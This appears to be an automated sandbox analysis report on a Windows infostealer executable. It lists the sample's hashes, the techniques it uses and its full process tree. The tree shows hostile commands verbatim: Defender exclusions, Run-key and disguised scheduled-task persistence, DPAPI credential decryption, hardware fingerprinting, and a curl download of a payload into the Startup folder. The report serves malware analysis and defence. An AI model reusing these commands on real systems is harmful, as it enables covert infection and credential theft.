7afdfc51e20e5f336761b4a1964a8949428dff7b96ea8389c4db9383afe2e336

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
11/05/2024, 07:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Size

37.6MB
MD5

dbcc5cfb5b91fae4370930affd3d7ef9
SHA1

5e5598375c5abeee8c18c9c28a5138e3763df29b
SHA256

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
SHA512

0b66dbb037c5e30a451732403d5e0f278588bf78d4c12d660b75f53713f05e233bb5785942155f5dab88ecb92edc789c8b583621077077f7bee1b56f20dc8584
SSDEEP

393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg196l+ZArYsFRlQ6x:R3on1HvSzxAMN1FZArYsDPv47OZRqIx

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3020	powershell.exe
4064	powershell.exe
1352	powershell.exe
4704	powershell.exe
3488	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

pid	Process
1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\MNPsLpdZOcgwFRU.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
892	cmd.exe
2144	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4376	schtasks.exe

Detects videocard installed 1 TTPs 9 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2852	WMIC.exe
3840	WMIC.exe
1796	WMIC.exe
2832	WMIC.exe
4072	WMIC.exe
1076	WMIC.exe
892	WMIC.exe
3796	WMIC.exe
1728	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
4940	tasklist.exe
2964	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
5052	reg.exe
2176	reg.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
4064	powershell.exe
4064	powershell.exe
592	powershell.exe
592	powershell.exe
4488	powershell.exe
4488	powershell.exe
3020	powershell.exe
3020	powershell.exe
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
3224	powershell.exe
3224	powershell.exe
3224	powershell.exe
4704	powershell.exe
4704	powershell.exe
4704	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
516	powershell.exe
516	powershell.exe
1352	powershell.exe
1352	powershell.exe
4912	powershell.exe
4912	powershell.exe
1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
4088	powershell.exe
1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
4088	powershell.exe
5088	powershell.exe
5088	powershell.exe
3588	powershell.exe
3588	powershell.exe
2452	powershell.exe
2452	powershell.exe
3516	powershell.exe
3516	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	4940	tasklist.exe
Token: SeDebugPrivilege	2964	tasklist.exe
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeIncreaseQuotaPrivilege	1268	WMIC.exe
Token: SeSecurityPrivilege	1268	WMIC.exe
Token: SeTakeOwnershipPrivilege	1268	WMIC.exe
Token: SeLoadDriverPrivilege	1268	WMIC.exe
Token: SeSystemProfilePrivilege	1268	WMIC.exe
Token: SeSystemtimePrivilege	1268	WMIC.exe
Token: SeProfSingleProcessPrivilege	1268	WMIC.exe
Token: SeIncBasePriorityPrivilege	1268	WMIC.exe
Token: SeCreatePagefilePrivilege	1268	WMIC.exe
Token: SeBackupPrivilege	1268	WMIC.exe
Token: SeRestorePrivilege	1268	WMIC.exe
Token: SeShutdownPrivilege	1268	WMIC.exe
Token: SeDebugPrivilege	1268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1268	WMIC.exe
Token: SeRemoteShutdownPrivilege	1268	WMIC.exe
Token: SeUndockPrivilege	1268	WMIC.exe
Token: SeManageVolumePrivilege	1268	WMIC.exe
Token: 33	1268	WMIC.exe
Token: 34	1268	WMIC.exe
Token: 35	1268	WMIC.exe
Token: 36	1268	WMIC.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeIncreaseQuotaPrivilege	4388	WMIC.exe
Token: SeSecurityPrivilege	4388	WMIC.exe
Token: SeTakeOwnershipPrivilege	4388	WMIC.exe
Token: SeLoadDriverPrivilege	4388	WMIC.exe
Token: SeSystemProfilePrivilege	4388	WMIC.exe
Token: SeSystemtimePrivilege	4388	WMIC.exe
Token: SeProfSingleProcessPrivilege	4388	WMIC.exe
Token: SeIncBasePriorityPrivilege	4388	WMIC.exe
Token: SeCreatePagefilePrivilege	4388	WMIC.exe
Token: SeBackupPrivilege	4388	WMIC.exe
Token: SeRestorePrivilege	4388	WMIC.exe
Token: SeShutdownPrivilege	4388	WMIC.exe
Token: SeDebugPrivilege	4388	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4388	WMIC.exe
Token: SeRemoteShutdownPrivilege	4388	WMIC.exe
Token: SeUndockPrivilege	4388	WMIC.exe
Token: SeManageVolumePrivilege	4388	WMIC.exe
Token: 33	4388	WMIC.exe
Token: 34	4388	WMIC.exe
Token: 35	4388	WMIC.exe
Token: 36	4388	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1268	WMIC.exe
Token: SeSecurityPrivilege	1268	WMIC.exe
Token: SeTakeOwnershipPrivilege	1268	WMIC.exe
Token: SeLoadDriverPrivilege	1268	WMIC.exe
Token: SeSystemProfilePrivilege	1268	WMIC.exe
Token: SeSystemtimePrivilege	1268	WMIC.exe
Token: SeProfSingleProcessPrivilege	1268	WMIC.exe
Token: SeIncBasePriorityPrivilege	1268	WMIC.exe
Token: SeCreatePagefilePrivilege	1268	WMIC.exe
Token: SeBackupPrivilege	1268	WMIC.exe
Token: SeRestorePrivilege	1268	WMIC.exe
Token: SeShutdownPrivilege	1268	WMIC.exe
Token: SeDebugPrivilege	1268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1268	WMIC.exe
Token: SeRemoteShutdownPrivilege	1268	WMIC.exe
Token: SeUndockPrivilege	1268	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 5032	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	85
PID 1388 wrote to memory of 5032	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	85
PID 5032 wrote to memory of 2368	5032	cmd.exe	86
PID 5032 wrote to memory of 2368	5032	cmd.exe	86
PID 5032 wrote to memory of 4064	5032	cmd.exe	87
PID 5032 wrote to memory of 4064	5032	cmd.exe	87
PID 4064 wrote to memory of 1932	4064	powershell.exe	89
PID 4064 wrote to memory of 1932	4064	powershell.exe	89
PID 1932 wrote to memory of 3872	1932	csc.exe	90
PID 1932 wrote to memory of 3872	1932	csc.exe	90
PID 1388 wrote to memory of 4704	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	91
PID 1388 wrote to memory of 4704	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	91
PID 4704 wrote to memory of 4856	4704	cmd.exe	92
PID 4704 wrote to memory of 4856	4704	cmd.exe	92
PID 1388 wrote to memory of 3628	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	93
PID 1388 wrote to memory of 3628	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	93
PID 3628 wrote to memory of 4940	3628	cmd.exe	94
PID 3628 wrote to memory of 4940	3628	cmd.exe	94
PID 1388 wrote to memory of 3060	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	96
PID 1388 wrote to memory of 3060	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	96
PID 1388 wrote to memory of 892	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	97
PID 1388 wrote to memory of 892	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	97
PID 3060 wrote to memory of 2964	3060	cmd.exe	98
PID 3060 wrote to memory of 2964	3060	cmd.exe	98
PID 892 wrote to memory of 592	892	cmd.exe	99
PID 892 wrote to memory of 592	892	cmd.exe	99
PID 1388 wrote to memory of 2144	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	100
PID 1388 wrote to memory of 2144	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	100
PID 2144 wrote to memory of 4488	2144	cmd.exe	101
PID 2144 wrote to memory of 4488	2144	cmd.exe	101
PID 1388 wrote to memory of 372	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	102
PID 1388 wrote to memory of 372	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	102
PID 1388 wrote to memory of 3016	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	103
PID 1388 wrote to memory of 3016	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	103
PID 1388 wrote to memory of 2356	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	104
PID 1388 wrote to memory of 2356	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	104
PID 1388 wrote to memory of 936	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	105
PID 1388 wrote to memory of 936	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	105
PID 1388 wrote to memory of 2656	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	106
PID 1388 wrote to memory of 2656	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	106
PID 936 wrote to memory of 3020	936	cmd.exe	107
PID 936 wrote to memory of 3020	936	cmd.exe	107
PID 372 wrote to memory of 1268	372	cmd.exe	108
PID 372 wrote to memory of 1268	372	cmd.exe	108
PID 3016 wrote to memory of 2064	3016	cmd.exe	109
PID 3016 wrote to memory of 2064	3016	cmd.exe	109
PID 2356 wrote to memory of 4376	2356	cmd.exe	110
PID 2356 wrote to memory of 4376	2356	cmd.exe	110
PID 2656 wrote to memory of 4388	2656	cmd.exe	144
PID 2656 wrote to memory of 4388	2656	cmd.exe	144
PID 1388 wrote to memory of 3904	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	112
PID 1388 wrote to memory of 3904	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	112
PID 3904 wrote to memory of 1080	3904	cmd.exe	113
PID 3904 wrote to memory of 1080	3904	cmd.exe	113
PID 1388 wrote to memory of 864	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	148
PID 1388 wrote to memory of 864	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	148
PID 1388 wrote to memory of 3820	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	115
PID 1388 wrote to memory of 3820	1388	6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe	115
PID 864 wrote to memory of 1872	864	cmd.exe	116
PID 864 wrote to memory of 1872	864	cmd.exe	116
PID 3820 wrote to memory of 4052	3820	cmd.exe	117
PID 3820 wrote to memory of 4052	3820	cmd.exe	117
PID 3820 wrote to memory of 2888	3820	cmd.exe	118
PID 3820 wrote to memory of 2888	3820	cmd.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe
"C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:2368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4064
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ofqx0hsz\ofqx0hsz.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1932
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES519A.tmp" "c:\Users\Admin\AppData\Local\Temp\ofqx0hsz\CSCD537D45FCFBB477ABB2701BB964CA9.TMP"
        5⤵
        
        PID:3872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4704
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3628
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3016
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Creates scheduled task(s)
    PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3020
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\guyctqcu\guyctqcu.cmdline"
      4⤵
      PID:2176
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B10.tmp" "c:\Users\Admin\AppData\Local\Temp\guyctqcu\CSC658B51A03A064A7491A24818D43760FA.TMP"
        5⤵
        
        PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3904
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    - Checks computer location settings
    PID:1080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:4536
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3488
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4704
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:5052
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:2176
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:4420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4052
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:4124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:2452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
